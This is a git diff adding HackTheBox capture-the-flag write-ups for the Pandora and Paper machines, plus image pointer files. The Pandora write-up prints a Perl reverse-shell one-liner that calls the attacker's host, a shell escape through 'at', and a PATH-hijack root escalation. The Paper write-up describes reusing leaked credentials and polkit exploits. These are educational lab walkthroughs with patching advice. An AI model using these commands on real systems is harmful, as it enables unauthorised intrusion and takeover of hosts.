+oid sha256:af47c01bf4985201766f2f5a2d5d75080a1e5ef0db4a90d00502afe69560e18c
+size 791135
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-6.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-6.webp
new file mode 100644
index 0000000..b514e98
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:facc4dc10ad098bee58ef5baceb933b43adebe9d3bfa7ccd87a7be0ca4bcb0cb
+size 107802
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-7.png b/content/writeup-ctf/writeup-pandora-htb/img/image-7.png
new file mode 100644
index 0000000..6e2bf37
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6878c0969b5722a1762dad207b6b0d1bf00b78d8df6450ffe71f8eab0f0f00d9
+size 40049
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-7.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-7.webp
new file mode 100644
index 0000000..0c5f4d6
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:eb0e71d67788ef3d3c4024bbd35b54e9c6a7b2e2c08ed51b06848c620eea216b
+size 33010
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-8.png b/content/writeup-ctf/writeup-pandora-htb/img/image-8.png
new file mode 100644
index 0000000..bc03c99
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c8e5e32898c0a9eac34267adf5a404d69fb5c3472fa5e81cda6bb85c73aaf281
+size 28511
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-8.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-8.webp
new file mode 100644
index 0000000..446e50f
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bd980bff7a5970ee308ffb742a2497f3c9f25354f5d8d48a9a274344104c4dd1
+size 28604
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-9.png b/content/writeup-ctf/writeup-pandora-htb/img/image-9.png
new file mode 100644
index 0000000..657bf93
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a6d5299989c77099dbd9deb56714d829ae86b7679a7987c1e4053ad46f1a00b9
+size 54089
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-9.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-9.webp
new file mode 100644
index 0000000..6e15616
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5ec854af17d172738fb5c862e93836159affb78295e0665d3df0fc97f233d05a
+size 43834
diff --git a/content/writeup-ctf/writeup-pandora-htb/index.md b/content/writeup-ctf/writeup-pandora-htb/index.md
new file mode 100644
index 0000000..e8fb09c
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/index.md
@@ -0,0 +1,162 @@
+---
+title: "Writeup - Pandora (HTB)"
+date: 2022-04-12
+slug: "writeup-pandora-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Pandora](https://app.hackthebox.com/machines/Pandora) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.11.136
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+In addition to these two ports, a UDP scan reveals a third port:
+
+
+```bash
+sudo nmap -sU 10.10.11.136
+```
+![](img/image-2.webp)
+
+So we discovered 3 open ports, the two TCP ports are quite common (SSH and HTTP) they are services often open to the outside. But the SNMP port is not common. It is generally a service that stays in the local network and is not intended to be accessible from outside.
+
+- 22/tcp : SSH port (OpenSSH 8.2p1)
+- 80/tcp : web server (Apache 2.4.41)
+- 161/udp : snmp server (SNMPv1)
+
+So I will start by looking for exploits related to the SNMP port.
+
+## Exploit
+
+After some research in Metasploit modules, I find "auxiliary/scanner/snmp/snmp\_enum". This module allows to get via SNMP a lot of information about our target.
+
+We find for example the open ports on the target PC:
+
+![](img/image-3.webp)
+
+A little further down we find the list of services that run on the machine, and in this list we find the following service:
+
+
+```bash
+829	runnable	sh 	/bin/sh	-c sleep 30; 
+/bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
+```
+This service, although ordinary, has two very interesting attributes: -u and -p. A User and a Password ! Being a user of our target machine it is possible that we could connect via SSH with these credentials... BINGO, we are connected!
+
+![](img/image-4.webp)
+
+After some research, I find a file "user.txt" in the user folder of "matt". But I don't have the permission. I will have to find a way to change the user.
+
+To start I scan the machine for potential exploit with the [linPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) script.
+
+To do this after hosting the script on a web server with the command:
+
+
+```bash
+sudo python3 -m http.server 81
+```
+I can then wget the file and add the execution rights:
+
+![](img/image-5.webp)
+
+After some research in the script result, I notice that a page "pandora\_console" is hosted on a site accessible only by local users.
+
+To access it remotely, I will do an SSH port forwarding with the following command:
+
+
+```bash
+ssh -L 8082:127.0.0.1:80 -N daniel@10.10.11.136
+```
+We can now access the site with the following address "127.0.0.1:8082/pandora\_console/" we arrive on the following site:
+
+![](img/image-6.webp)
+
+After some research I find the Pandora exploit [CVE-2021-32099](https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained/) and more particularly the following script which allows via the admin session cookie the creation of a shell.
+
+[GitHub - shyam0904a/Pandora\_v7.0NG.742\_exploit\_unauthenticated: Unauthenticated Sqlinjection that leads to dump data base but this one impersonated Admin and drops a interactive shellUnauthenticated Sqlinjection that leads to dump data base but this one impersonated Admin and drops a interactive shell - GitHub - shyam0904a/Pandora\_v7.0NG.742\_exploit\_unauthenticated: Unauthentic...![](https://github.com/fluidicon.png)
+
+{{< github repo="shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated" >}}
+
+After executing the script, we can retrieve the first flag which is the matt flag:
+
+![](img/image-7.webp)
+
+
+```bash
+CMD > cat /home/matt/user.txt
+285476d908ea2c455c35d028d52969b3
+```
+Now I will try to create a reverse shell a little better to do the privilege elevation. For that I test a number of commands from this [github](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md). After about ten tests, I finally find one that works:
+
+
+```bash
+perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.14.246:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
+```
+I do a shell upgrade with the following command:
+
+
+```bash
+python3  -c 'import pty;pty.spawn("/bin/bash")'
+```
+I now have a clean shell with the user matt.
+
+![](img/image-8.webp)
+
+## Privilege escalation
+
+For the elevation of privilege I re-run the [linPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) script and look for vulnerabilities to explore. The first one I found is the CVE-2021-4034 which allows the switch in root. No luck the host does not have gcc. I'll look for something else...
+
+I then list the commands that can be executed by everyone but that run with high privilege:
+
+
+```bash
+find / -perm -u=s -type f 2>/dev/null
+```
+![](img/image-9.webp)
+
+I then search for matches on the [GTFOBins](https://gtfobins.github.io) site and find an interesting exploit allowing to remove the restrict shell with the command "at":
+
+
+```bash
+echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
+```
+![](img/image-10.webp)
+
+I will now be able to use the sudo command, but I don't have matt's password, I have to find another lever to get root. A second command that seemed interesting was: "pandora\_backup". Indeed a custom script and therefore with potential flaws. After downloading it locally, I extract the strings to try to see if I can recover some information from the :
+
+
+```bash
+strings pandora_backup
+```
+We notice that the tar command is used to compress files in the root folder.  But the call to tar does not use the full path, so we will be able to change the $PATH for a custom executable allowing us a privilege elevation. 
+
+For that I create a "tar" file in the "tmp" folder, then I put the command /bin/sh inside. After adding the permissions on the file I can run the script :
+
+
+```bash
+cd /tmp && echo "/bin/sh" > tar && chmod 777 tar
+export PATH=/tmp:$PATH
+pandora_backup
+```
+We now have a root shell and we can retrieve the last flag in the root folder:
+
+![](img/image-11.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not leave the SNMP port open to the outside
+- Use SNMPv3 which is much more secure
+- Update Pendora: the problem is patched in the latest version
+- Do not use login/password in program execution commands
+- Use public/private keys for SSH authentication
diff --git a/content/writeup-ctf/writeup-paper-htb/featured.png b/content/writeup-ctf/writeup-paper-htb/featured.png
new file mode 100644
index 0000000..318f61d
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0a6bb3a6471067523948b8a426f04f40aff1fba096d60e17119f99dc574b5bc1
+size 290842
diff --git a/content/writeup-ctf/writeup-paper-htb/featured.webp b/content/writeup-ctf/writeup-paper-htb/featured.webp
new file mode 100644
index 0000000..e501ff9
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e1ff11b4e4b60cea6dd70610fc839cb27626fa2c5b87892edd231b0b0fbcb981
+size 27460
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-1.png b/content/writeup-ctf/writeup-paper-htb/img/image-1.png
new file mode 100644
index 0000000..19150e2
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:644217a205d8274dc11bfede3dab1c49e7e4c4e3709e951515cdbe4f04a547a9
+size 54869
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-1.webp b/content/writeup-ctf/writeup-paper-htb/img/image-1.webp
new file mode 100644
index 0000000..3131c0b
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:03e0069fa122527199f97fba8cdefd299dee126651cb4bbf01f189b82a970e45
+size 49232
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-10.png b/content/writeup-ctf/writeup-paper-htb/img/image-10.png
new file mode 100644
index 0000000..2d3b26f
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2e581318e51a40e60e1cdb2037d67cab0382408f32b8286699529d2dbf464c53
+size 41840
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-10.webp b/content/writeup-ctf/writeup-paper-htb/img/image-10.webp
new file mode 100644
index 0000000..f759bdd
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ef50d8b7faf37f21accb0c6cfdb16bef3b6c90fec75a41615d164a2aec9edb5b
+size 33284
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-11.png b/content/writeup-ctf/writeup-paper-htb/img/image-11.png
new file mode 100644
index 0000000..bbe3f13
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e7aa536741003fec1e2242f8d42d77309db5925861b4449b53efb7c52ee8696b
+size 16667
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-11.webp b/content/writeup-ctf/writeup-paper-htb/img/image-11.webp
new file mode 100644
index 0000000..998386f
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a8ac9b032f2bb3afb7d6067a9c68d4efac3f7d849992bc736088778614954863
+size 15314
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-12.png b/content/writeup-ctf/writeup-paper-htb/img/image-12.png
new file mode 100644
index 0000000..1afc825
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1ff7794509b22fc4106299f8821d75bc7562c60125d919e7278c55b01313cba4
+size 95519
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-12.webp b/content/writeup-ctf/writeup-paper-htb/img/image-12.webp
new file mode 100644
index 0000000..c0d8e54
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d053dfb820ce384596fb4f2c61501396fdc8346b9ed4321cdf78257a0fd8266c
+size 83378
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-13.png b/content/writeup-ctf/writeup-paper-htb/img/image-13.png
new file mode 100644
index 0000000..78953ba
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-13.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0ee023e85449a98942d9df0b34ef84c709f9786c8e524666a12c53cdefe930bb
+size 45714
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-13.webp b/content/writeup-ctf/writeup-paper-htb/img/image-13.webp
new file mode 100644
index 0000000..13a001b
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a8ff10020029679217d2f7fa94dfa83c2b3fc39f2fe1dcb2e74d457f9f42bedd
+size 42540
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-2.png b/content/writeup-ctf/writeup-paper-htb/img/image-2.png
new file mode 100644
index 0000000..7f90a15
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a0e02f6a11c2407d3ed5273ec1669b84d1341a8fb7aced1ee8022203d37ba742
+size 38803
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-2.webp b/content/writeup-ctf/writeup-paper-htb/img/image-2.webp
new file mode 100644
index 0000000..2ef50ec
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:feba75693796bd3fffbe0cbcf02bc367c8e8aec1c9dda2ce6d37c1090935917c
+size 33866
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-3.png b/content/writeup-ctf/writeup-paper-htb/img/image-3.png
new file mode 100644
index 0000000..4efa036
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:367e58b5cc6b5c4fe4b30c9c4fc12118b7e2993575c0d1b5f2085c48452a068a
+size 2496230
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-3.webp b/content/writeup-ctf/writeup-paper-htb/img/image-3.webp
new file mode 100644
index 0000000..824f94b
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:905cbf0e23b39052f427de04950db7750ffb94f9b8f62e5b2294d9eb63a199a9
+size 342674
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-4.png b/content/writeup-ctf/writeup-paper-htb/img/image-4.png
new file mode 100644
index 0000000..6d55ddf
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3c6a2cbdb55ee1125c11c773063a3ffb6599e31d1c08629e42202283b07e21fc
+size 106235
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-4.webp b/content/writeup-ctf/writeup-paper-htb/img/image-4.webp
new file mode 100644
index 0000000..9262a5a
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:323cff4b6014ad1428931edde191879e71a699a4c729bf00fd827a51af07b08a
+size 90746
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-5.png b/content/writeup-ctf/writeup-paper-htb/img/image-5.png
new file mode 100644
index 0000000..94dfd6e
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:505a61661046b3a56e31741896554e753069f1156720b2dfe632b7dca4065dfd
+size 27863
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-5.webp b/content/writeup-ctf/writeup-paper-htb/img/image-5.webp
new file mode 100644
index 0000000..02d700d
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3d7228c533f31b269eca8dbb7ac59cebdbc26c823c1fd6ce4eea794f83417003
+size 19464
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-6.png b/content/writeup-ctf/writeup-paper-htb/img/image-6.png
new file mode 100644
index 0000000..ac4163f
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ab9c4ab221b5fac615ddc49b6a80e731ae973c36b35096779011a7c1031dca18
+size 36775
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-6.webp b/content/writeup-ctf/writeup-paper-htb/img/image-6.webp
new file mode 100644
index 0000000..2bb81f5
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f205b5b475df89c440f4f3dee2deef78b9f5189c73f54672d66d81bf29978b47
+size 24208
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-7.png b/content/writeup-ctf/writeup-paper-htb/img/image-7.png
new file mode 100644
index 0000000..97ac91d
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8963f78953916d3a24adc5c9b0f5ec94c82e593e313ae4138df81f7593f53c23
+size 68605
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-7.webp b/content/writeup-ctf/writeup-paper-htb/img/image-7.webp
new file mode 100644
index 0000000..d64aec1
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:db3c3b181814d604be85c4f2cb8695cc003ba37a27eee209269cff1ce3936b1a
+size 68020
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-8.png b/content/writeup-ctf/writeup-paper-htb/img/image-8.png
new file mode 100644
index 0000000..5024fda
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2fa46b3a77b267b76fbd6017bd51adf042b72e1aa82671bfb950e37870606dd4
+size 30141
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-8.webp b/content/writeup-ctf/writeup-paper-htb/img/image-8.webp
new file mode 100644
index 0000000..db57a1c
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2be003818fb2d537528c48016d961025363a6eb3d313aecd0ee983ee3b8d8783
+size 30974
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-9.png b/content/writeup-ctf/writeup-paper-htb/img/image-9.png
new file mode 100644
index 0000000..506b2ec
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ab77f01814c1f43538984659370197ffc4f109548bb1a012923e50b61c27c772
+size 83566
diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-9.webp b/content/writeup-ctf/writeup-paper-htb/img/image-9.webp
new file mode 100644
index 0000000..9532934
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3220e151af2d7280e5ca9ba45e564c489f510b32e2967d9a2c5d62c065cb8e0e
+size 76426
diff --git a/content/writeup-ctf/writeup-paper-htb/index.md b/content/writeup-ctf/writeup-paper-htb/index.md
new file mode 100644
index 0000000..55cadfd
--- /dev/null
+++ b/content/writeup-ctf/writeup-paper-htb/index.md
@@ -0,0 +1,140 @@
+---
+title: "Writeup - Paper (HTB)"
+date: 2022-04-05
+slug: "writeup-paper-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Paper](https://app.hackthebox.com/machines/Paper) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.11.143
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2p1)
+- 80/tcp : HTTP web server (Apache 2.4.37)
+- 443/tcp : HTTPS web server (Apache 2.4.37)
+
+After checking the site via a web browser nothing is displayed, let's make a Curl request to see what the server sends us as a response:
+
+![](img/image-2.webp)
+
+We can see that the server accepts requests with the domain "office.paper", let's add this domain in our hosts file:
+
+
+```bash
+10.10.11.143	office.paper
+```
+![](img/image-3.webp)
+
+We can now access the site, now let's look for exploits !
+
+## Exploit
+
+After inspecting the page, I notice that it is a site based on the CMS Wordpress, let's do a scan with "WPScan" to try to identify flaws:
+
+![](img/image-4.webp)
+
+After some research, I realize that the version of Worpress used is vulnerable to [CVE-2019-17671](https://www.exploit-db.com/exploits/47690). 
+
+Overall this exploit allows unidentified people to see normally private content. To do this we add the querry "?static=1" to the link of the site. This gives us access to a page with the following content:
+
+
+```
+ http://office.paper/?static=1
+ 
+ test
+
+Micheal please remove the secret from drafts for gods sake!
+
+Hello employees of Blunder Tiffin,
+
+Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.
+
+So, I kindly request you all to take your discussions from the public blog to a more private chat system.
+
+-Nick
+
+# Warning for Michael
+
+Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick
+
+Threat Level Midnight
+
+A MOTION PICTURE SCREENPLAY,
+WRITTEN AND DIRECTED BY
+MICHAEL SCOTT
+
+[INT:DAY]
+
+Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….
+
+# Secret Registration URL of new Employee chat system
+
+http://chat.office.paper/register/8qozr226AhkCHZdyY
+
+# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.
+
+# Also, stop looking at my drafts. Jeez!
+```
+In this text one thing interests us the link "chat.office.paper", indeed it is a link allowing to register on an exchange platform used by the company having the site. I add the domain in my "hosts" file then I click on the link to create an account:
+
+![](img/image-5.webp)
+
+My account gives me access to several elements and in particular has a conversation with the various employees of the company. In this discussion we learn that dwight has created a bot that can interact with files. I start a private conversation with this bot and test some commands:
+
+![](img/image-6.webp)
+
+The output of the "listing" query is the same as for the "ls -l" command, interesting would it be possible to add a command afterwards so that the program interprets it? Unfortunately not, the bot detects the attempt as command injection and blocks it. No luck, let's try something else.
+
+Let's try to list another folder, for example the parent folder :
+
+![](img/image-7.webp)
+
+Bingo, we have the list of files from the parent folder to "dirty". I notice that a folder has the name of the bot, it must be its source code. In this folder we find a file ".env". This kind of folder contains environment variables and possibly crendential.
+
+![](img/image-8.webp)
+
+And yes, it does contain credentials! Let's try to use them to connect via SSH. No luck it doesn't work with the user "recyclops", but we know that it is "dwight" who created the bot, could he have used the same password for his account and the bot : let's try :
+
+![](img/image-9.webp)
+
+It works, we now have an SSH session with the user "dwight" and access to the first flag.
+
+## Privilege escalation
+
+I start by using the [linPeas](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) script to have a first list of exploits. For that I upload the file, I add the execution rights and I launch it:
+
+![](img/image-10.webp)
+
+After some analysis of the script result, I find that the machine is vulnerable to CVE-2021-3560.
+
+![](img/image-11.webp)
+
+Quickly I find this [script](https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation) which allows the exploitation and the creation of a root session. Unfortunately, after several tries, the script does not work.
+
+![](img/image-12.webp)
+
+Let's try another [script](https://github.com/Almorabea/Polkit-exploit) :
+
+![](img/image-13.webp)
+
+This time it works and create me a root session, I now have control of the machine and can recover the root flag.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update wordpress plugins
+- Restricted access to the bot
+- Do not leave credencials in an accessible file
+- Generate unique credencials when creating a bot
+- Upgrade linux to avoid old CVEs
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/featured.png b/content/writeup-ctf/writeup-plotted-tms-thm/featured.png
new file mode 100644
index 0000000..5341cd4
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d7c3a6bcefb12a891b4a21d25997d0960f184e1872bb6b73797f9bfbcb557ad3
+size 1785218
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/featured.webp b/content/writeup-ctf/writeup-plotted-tms-thm/featured.webp
new file mode 100644
index 0000000..efca1da
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:50ba94222a8a082a52f10c3d4c07665389181450c13e1b25a0c5f068535139b1
+size 1975792
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.png
new file mode 100644
index 0000000..a8cb422
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ffd30c97daa1a4f73e3946cb146ac854ed2352cb15d0c65649370d82d9ac12b5
+size 39447
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.webp
new file mode 100644
index 0000000..1948829
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:262af0e573814ed86333702d2d49f3baaf0e61abac0c112d128ef024262f1ed5
+size 39904
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.png
new file mode 100644
index 0000000..49d349e
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:361f69579143e453f97cc4dba3512ac682995e5df90ceed16a6b6926a9cd94c6
+size 4377
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.webp
new file mode 100644
index 0000000..f6e0103
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5611b0b7826f69fa61f820944bc944d4b13b123b252f16082d5b8e247676a879
+size 7250
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.png
new file mode 100644
index 0000000..48a03f2
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e2069dbb266b0fa0c166435a065270b06e1bb95b615a046d6e5564486874d116
+size 56346
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.webp
new file mode 100644
index 0000000..69fc4ca
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bc8c8321bf432a5f77663bbea82634e98a9b884c80694af5be3d7622eca619bc
+size 57872
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.png b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.png
new file mode 100644
index 0000000..496f9c8
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:67ab94c4cd31a4c4e434c35a3b19f22fc402c8c133a84145852f967659fbe830
+size 58485
diff --git a/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.webp b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.webp
new file mode 100644
index 0000000..8c18e11
--- /dev/null
+++ b/content/writeup-ctf/writeup-plotted-tms-thm/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:33e5a95ad01bd6c148cff1059ce0a1b32ee6cbd8caf3e7a8afdea1b6483e1cb5
+size 55894
